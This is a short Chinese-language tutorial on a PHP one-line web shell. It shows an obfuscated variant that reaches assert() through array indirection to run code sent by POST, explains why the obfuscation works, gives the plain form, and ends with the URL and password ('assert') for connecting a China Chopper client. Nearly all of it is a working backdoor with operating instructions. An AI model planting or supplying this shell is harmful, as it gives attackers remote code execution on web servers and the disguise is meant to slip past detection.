<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?>

assert，是php代码执行函数，与eval()有同样的功能，assert（）函数中参数为表达式 （或者为函数）

因为$array[], POST[]都是数组，所以$array[]=$POST，就是把$POST数组的值赋给$array数组

这样的话$array[0]['POST']的输出就是assert，所以组成了一句话木马

<?php assert($_POST['assert']);?>

构造菜刀 ip/www/index.php?POST=assert 密码为assert